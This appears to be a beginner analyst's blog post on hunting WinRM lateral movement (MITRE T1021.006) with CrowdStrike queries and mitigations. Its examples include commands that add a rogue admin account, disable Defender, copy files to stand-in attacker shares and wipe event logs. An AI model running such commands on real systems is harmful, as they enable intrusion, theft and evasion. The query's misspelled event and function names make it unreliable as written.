When it comes to threat hunting, Falcons’ Advanced event search is a great way to search for malicious activity in your network. As I have begun my cybersecurity career, I have been given several ‘scavenger hunts’ to get up to speed on the query languages in our environment.
In this one, we were given very little information. We are to answer three main questions. For security reasons and I don’t feel quite comfortable just yet sharing information about the network on the internet. I wont include any screenshots of the hunt. Like any hunt, we need to figure out what has happened, how it happened and how we can mitigate this attack technique.
I was tasked with focusing on hunting for MITRE ATT&CK Technique T1021.006: Remote Services: Windows Remote Management (WinRM) using CrowdStrike.
Windows Remote Management
Windows Remote Management (WinRM) is Microsoft’s implementation of the Web Services-Management (WS-Management) protocol. It’s a SOAP-based (Simple Object Access Protocol) protocol designed to enable communication between systems, even across different vendors.
One of the key features of WinRM is its ability to interact with Windows Management Instrumentation (WMI) to provide management data.
This makes it incredibly useful for tasks like gathering system information, automating administrative tasks, and managing hardware through the Intelligent Platform Management Interface (IPMI).
Its utility for proper use also makes it quite a good tool for adversaries. Once Inital Access is gained an actor can execute remote commands on other machines in the network to perform lateral access techniques or to gather more information about the network.
Pre-requisites
- What is SOAP?
- How is WinRM used normally?
- Know what threat hunting is? I think? If you found this then you were probably looking for it…
SOAP
SOAP is a XML based protocol for interacting with web services, well… simply. Basically the message is a xml snippet and must:
- Use the SOAP Envelope namespace
- Not contain a document type definition (DTD)
- Not contain processing instructions.
Heres an example message from W3 Schools
<?xml version="1.0"?>
<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
soap:encodingStyle="http://www.w3.org/2003/05/soap-encoding">
<soap:Header></soap:Header>
<soap:Body>
<soap:Fault></soap:Fault>
</soap:Body>
</soap:Envelope>
So message goes in XML and the WinRM service can accept these messages and do the thing with them.
WinRM as sold by Microsoft
Here is a VBScript from Microsoft’s documentation! This basically opens a connection and shows the xml output from WinRM.
Const RemoteComputer = "ComputerName.domain.com"
Set objWsman = CreateObject("Wsman.Automation")
Set objConnectionOptions = objWsman.CreateConnectionOptions
objConnectionOptions.UserName = "Username"
objConnectionOptions.Password = "Password"
iFlags = objWsman.SessionFlagUseKerberos Or _
objWsman.SessionFlagCredUserNamePassword
Set objSession = objWsman.CreateSession("https://" & RemoteComputer, _
iFlags, objConnectionOptions)
strResource = "http://schemas.microsoft.com/wbem/wsman/1/" & _
"wmi/root/cimv2/Win32_OperatingSystem"
Set objResponse = objSession.Enumerate(strResource)
While Not objResponse.AtEndOfStream
DisplayOutput(objResponse.ReadItem)
Wend
'****************************************************
' Displays WinRM XML message using built-in XSL
'****************************************************
Sub DisplayOutput(strWinRMXml)
Dim xmlFile, xslFile
Set xmlFile = CreateObject("MSXml2.DOMDocument.3.0")
Set xslFile = CreateObject("MSXml2.DOMDocument.3.0")
xmlFile.LoadXml(strWinRMXml)
xslFile.Load("WsmTxt.xsl")
Wscript.Echo xmlFile.TransformNode(xslFile)
End Sub
Understanding T1021.006: Remote Services - Windows Remote Management
WinRM is a legitimate Windows feature used for remote management. However, adversaries often abuse it to execute commands or move laterally within a network. Detecting such activity requires a combination of behavioral analysis and event correlation.
WinRM is the service and protocol used by to interact with a remote system.
Example 1: Using Invoke-Command for Remote Execution
# Get the hostname of the remote system
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { hostname }
# Retrieve detailed system information
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { systeminfo }
# Get the IP configuration of the remote system
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { ipconfig }
# List all user accounts on the remote system
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { net user }
# List all groups on the remote system
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { net localgroup }
# Create a new user with administrative privileges
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { net user BadGuy Password123 /add }
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { net localgroup administrators BadGuy /add }
# Disable Windows Defender
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock {
Set-MpPreference -DisableRealtimeMonitoring $true }
# Exfiltrate sensitive files
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock {
Copy-Item -Path "C:\SensitiveData\*" -Destination "\\BadGuyServer\ExfilShare"
}
# Clear the event logs on the remote system
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock {
wevtutil cl System
}
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock {
wevtutil cl Security
}
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock {
wevtutil cl Application
}
# Execute a command on another remote system from the current remote session
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock {
Invoke-Command -ComputerName "RemoteHost02" -ScriptBlock {
Get-Process
}
}
Example 2: Using winrs for Remote Execution
# Get the hostname of the remote system
winrs -r:RemoteHost01 hostname
# Get the IP configuration of the remote system
winrs -r:RemoteHost01 ipconfig
# Retrieve detailed system information
winrs -r:RemoteHost01 systeminfo
# List all user accounts on the remote system
winrs -r:RemoteHost01 net user
# List all groups on the remote system
winrs -r:RemoteHost01 net localgroup
# List shared resources on the remote system
winrs -r:RemoteHost01 net share
# Create a new user with administrative privileges
winrs -r:RemoteHost01 net user EvilUser Password123 /add
winrs -r:RemoteHost01 net localgroup administrators EvilUser /add
# Disable Windows Defender
winrs -r:RemoteHost01 powershell "Set-MpPreference -DisableRealtimeMonitoring $true"
# Exfiltrate sensitive files
winrs -r:RemoteHost01 copy C:\SensitiveData\* \\AttackerServer\ExfilShare
# Clear the event logs on the remote system
winrs -r:RemoteHost01 wevtutil cl System
winrs -r:RemoteHost01 wevtutil cl Security
winrs -r:RemoteHost01 wevtutil cl Application
Basically, have access to local machine -> execute commands on a remote host as the user on your local machine.
With these examples, we can see some of the things an adversary could possibly get away with.
Cool, now how do we hunt for it.
Threat Hunting for T1021.006 Remote Services
This is how I ended up looking for this specific threat.
in(field="#event_simpleName", values=["NetworkRecieveAcceptIP4", "ProcessRollup2"])
| LocalPort = 5985 or LocalPort = 5986
OR CommandLine = "*winrs.exe*" OR CommandLine = "*wsmprovhost.exe*"
OR BaseParentFileName = "*winrs.exe*" OR BaseParentFileName = "*wsmprovhost.exe*"
| timestamp := foramtTime(format="%m/%d/%Y %H:%M:%S",
timezone="Place/Place") -- Format the timestamp into something readable
| CommandLine = "*" -- CommandLine contains something.
| groupBy([ComputerName], function=collect(
[CommandLine, UserName, LocalIP, LocalPort, RemoteIP, RemotePort]
)
)
Mitigations for T1021.006 Remote Services
- If you don’t use it, disable it. M1042
- If it is a necessary, use network segmentation and separate those hosts from the network. Ensure access from the proper machines. M1030
- Make sure those network segments can only be accessed by separate WinRM accounts. M1026